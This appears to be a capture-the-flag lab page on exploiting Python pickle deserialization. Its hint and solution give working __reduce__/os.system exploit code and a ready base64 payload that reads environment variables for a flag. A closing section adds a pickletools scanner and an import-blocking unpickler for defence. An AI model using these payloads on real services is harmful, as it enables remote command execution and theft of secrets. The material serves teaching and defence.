Python3

Insecure deserialization - Python pickle


Exploit the insecure deserialization performed by the function pickle.loads() to achieve remote code execution (RCE) on the target system. Use the RCE to extract the flag, which is located in the system environment variables.

Be aware

~ The second hint gives the exploitation code to create serialized payloads that can execute system commands on the target

Hints

Hint #1

You can read how Python pickle works in the official Python pickle documentation.

Hint #2
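import os, pickle, base64
def Exploit():
    class rce:
        # pickle stores the (callable, args) pair returned by __reduce__;
        # pickle.loads() calls it when the payload is deserialized
        def __reduce__(self):
            return os.system, ('id',)
    # return an instance so that pickle.dumps() serializes the object, not None
    return rce()
payload = base64.urlsafe_b64encode( pickle.dumps( Exploit() ))
print(payload)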

Solution

Read the solution

Exploit code:

import os, pickle, base64
class Exploit:
    def __reduce__(self):
        return os.system, ('env | grep -i flag',)

payload = base64.urlsafe_b64encode( pickle.dumps( Exploit() )).decode('utf-8')
print(payload)

This exploit code returns the payload below. Feel free to replace env | grep -i flag with any system command.

gASVLQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBJlbnYgfCBncmVwIC1pIGZsYWeUhZRSlC4=
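
A defensive counterpart to the solution, added here as an example and not part of the original challenge: it disassembles the payload above with pickletools without executing it, then shows an Unpickler whose find_class rejects every import. The names scan_pickle, NoGlobalsUnpickler and safe_loads are hypothetical, and the STACK_GLOBAL name recovery is a heuristic.

```python
import base64
import io
import pickle
import pickletools

# Payload string from the solution above. It is only inspected or fed to the
# restricted loader below, never to pickle.loads().
PAGE_PAYLOAD = "gASVLQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBJlbnYgfCBncmVwIC1pIGZsYWeUhZRSlC4="

# Opcodes that call a previously resolved object during unpickling.
CALL_OPS = {"REDUCE", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def scan_pickle(data: bytes) -> dict:
    """Walk the opcode stream without executing it; report imports and calls."""
    strings, imports, calls = [], [], []
    for op, arg, _pos in pickletools.genops(data):
        if isinstance(arg, str):
            strings.append(arg)
        if op.name in ("GLOBAL", "INST"):
            imports.append(arg.replace(" ", "."))  # arg is "module name"
        elif op.name == "STACK_GLOBAL":
            # Heuristic: module and name are the two strings pushed just before.
            imports.append(".".join(strings[-2:]))
        elif op.name in CALL_OPS:
            calls.append(op.name)
    # An endpoint that expects plain data should treat any import as hostile.
    return {"imports": imports, "calls": calls, "suspicious": bool(imports)}


class NoGlobalsUnpickler(pickle.Unpickler):
    """Refuses every import, so only plain containers and scalars can load."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def safe_loads(b64_text: str):
    """Decode URL-safe base64 and unpickle plain data only."""
    data = base64.urlsafe_b64decode(b64_text)
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    print(scan_pickle(base64.urlsafe_b64decode(PAGE_PAYLOAD)))
    try:
        safe_loads(PAGE_PAYLOAD)
    except pickle.UnpicklingError as exc:
        print("rejected:", exc)
```

The scan reports the posix.system import followed by REDUCE, which is the pair that turns deserialization into a command call; the restricted loader stops at the import, so the call is never reached.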